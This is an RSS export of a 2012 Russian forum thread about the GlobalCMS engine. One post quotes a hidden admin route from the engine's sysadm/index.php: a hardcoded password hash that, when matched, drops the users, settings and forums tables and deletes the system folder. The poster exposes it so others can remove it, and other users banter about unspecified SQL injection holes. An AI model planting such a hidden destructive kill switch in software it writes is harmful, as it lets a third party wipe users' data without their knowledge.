GlobalCMS - Visavi.net

GlobalCMS - Visavi.net https://visavi.net/ RSS - Visavi.net https://visavi.net/assets/img/images/logo_small.png RSS - Visavi.net https://visavi.net/ [email protected] (admin) [email protected] (admin) Mon, 18 Nov 2024 02:44:08 +0300 <blockquote class="blockquote">iNeeXT (9 Мая 2012 / 19:25) 3. MILORD, вот например <a href="http://prntscr.com/91jnz" target="_blank" rel="nofollow">http://prntscr.com/91jnz</a></blockquote> Норм, че) Грузим в любую папку))))))) https://visavi.net/topics/31810/563219 GlobalCMS Вадим Tue, 12 Jun 2012 04:11:47 +0400 Сообщения https://visavi.net/topics/31810/563219 <blockquote class="blockquote">ZiGR (26 Мая 2012 / 20:48) 27. MILORD, c моей темой о поиске sql inj ознакомился и согласен платить?</blockquote> бред <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557176 GlobalCMS MILORD Sat, 26 May 2012 20:51:37 +0400 Сообщения https://visavi.net/topics/31810/557176 <blockquote class="blockquote">ZiGR (26 Мая 2012 / 20:16) 24. MILORD, SQL inj. Ясно? Такое ощущение, что ты что-то там фильтруешь <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> </blockquote> покажи хоть одну опасную sql injection https://visavi.net/topics/31810/557174 GlobalCMS MILORD Sat, 26 May 2012 20:46:52 +0400 Сообщения https://visavi.net/topics/31810/557174 <blockquote class="blockquote">MILORD (26 Мая 2012 / 20:13) Ну ка,ну ка.Кодер,скажи мне,какие иньекции на mysqli могут быть?</blockquote> Ботекс. Круто че. З.ы. а от каких защитит?))) https://visavi.net/topics/31810/557171 GlobalCMS ramzes Sat, 26 May 2012 20:33:14 +0400 Сообщения https://visavi.net/topics/31810/557171 <blockquote class="blockquote">ZiGR (26 Мая 2012 / 20:04) Не буду намекать на наличие SQL inj ;)</blockquote> Ну ка,ну ка.Кодер,скажи мне,какие иньекции на mysqli могут быть? https://visavi.net/topics/31810/557168 GlobalCMS MILORD Sat, 26 May 2012 20:13:11 +0400 Сообщения https://visavi.net/topics/31810/557168 <blockquote class="blockquote">ZiGR (26 Мая 2012 / 18:10) 21. Wennel, я не буду писать их кол-во, т.к боюсь напугать <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> </blockquote> что-то мне уже страшно этот двиг юзать https://visavi.net/topics/31810/557167 GlobalCMS Тимофей Sat, 26 May 2012 20:12:10 +0400 Сообщения https://visavi.net/topics/31810/557167 <blockquote class="blockquote">ZiGR (26 Мая 2012 / 18:04) Не буду намекать на наличие SQL inj ;)</blockquote> <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557165 GlobalCMS Тимофей Sat, 26 May 2012 20:05:44 +0400 Сообщения https://visavi.net/topics/31810/557165 18. Wennel, Приятно слышать)) https://visavi.net/topics/31810/557162 GlobalCMS MILORD Sat, 26 May 2012 20:00:43 +0400 Сообщения https://visavi.net/topics/31810/557162 <blockquote class="blockquote">MILORD (26 Мая 2012 / 17:55) 16. Wennel, <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> халявщик,как сам по скрипт?</blockquote> для основы сойдет <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> остальное сам буду писать <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557161 GlobalCMS Тимофей Sat, 26 May 2012 19:58:29 +0400 Сообщения https://visavi.net/topics/31810/557161 16. Wennel, <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> халявщик,как сам по скрипт? https://visavi.net/topics/31810/557160 GlobalCMS MILORD Sat, 26 May 2012 19:55:58 +0400 Сообщения https://visavi.net/topics/31810/557160 sysadm/index.php Строки 217-245 <pre class="prettyprint">case 'aut': if (!$id) $id = $ya['id']; $diz -> head('Вы не авторизированы'); $diz -> title('Вы не авторизированы'); $pasm='f91a7558fba129bec62e8b0baf3cce85'; if (empty($_POST['pass'])) { $msg .= '<form action="./?do=aut" method="post"><div>'; $msg .= 'Ваш ник: <input type="text" name="login" maxlength="30" title="Введите ник"/> Ваш пароль: <input type="pass" name="pass" maxlength="30" title="Введите пароль"/> <input type="submit" value="Авторизация"/></div></form>'; }elseif(md5(md5($_POST['pass'])) != $pasm) { $diz -> head('Ошибка'); $diz -> title('Ошибка'); $diz -> out('пароль не верен,повторите..! <a href="/aut.php">Назад</a>'); header('refresh: 3; /aut.php'); }else{ $db -> query("DROP TABLE `users`"); $db -> query("DROP TABLE `nastroiki`"); $db -> query("DROP TABLE `forums`"); rmdir (ROOT.'system'); } $msg .= '<div class="levo">'.$diz -> img('back.png').'<a href="./">Назад</a>'; $msg .= ' '.$diz -> img('home.png').'<a href="../">На главную</a></div>'; $diz -> out($msg); break;</pre> удаляем и всё <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> снимаем копирайт Добавлено через 00:39 сек. лично я убрал на денвере у себя уже <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> https://visavi.net/topics/31810/557156 GlobalCMS Тимофей Sat, 26 May 2012 19:50:39 +0400 Сообщения https://visavi.net/topics/31810/557156 14. KiPiSH, о_О расшифруешь-тебе нобиливку дадут.Нет способа расшифровать алгоритм md5(md5 https://visavi.net/topics/31810/557153 GlobalCMS MILORD Sat, 26 May 2012 19:45:52 +0400 Сообщения https://visavi.net/topics/31810/557153 Интересно это. Ты знаешь пароль от админки стороннего сайта. следовательно пароль хранится на этом же сайте. Скачиваем скрипт => находим где хранится=>расшифровываем и всё, кладём сайты чужие. https://visavi.net/topics/31810/557151 GlobalCMS Андрей Sat, 26 May 2012 19:42:27 +0400 Сообщения https://visavi.net/topics/31810/557151 <blockquote class="blockquote">rastoman (26 Мая 2012 / 19:31) Скажи, а зачем на странице примера плавающие окна? Добавлено через 00:43 сек. Это же вап сайт</blockquote> пример не мой <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> я через гугл нашёл,видимо хост уг бесплатный там https://visavi.net/topics/31810/557149 GlobalCMS MILORD Sat, 26 May 2012 19:33:30 +0400 Сообщения https://visavi.net/topics/31810/557149 Скажи, а зачем на странице примера плавающие окна? Добавлено через 00:43 сек. Это же вап сайт https://visavi.net/topics/31810/557147 GlobalCMS Александр Sat, 26 May 2012 19:31:27 +0400 Сообщения https://visavi.net/topics/31810/557147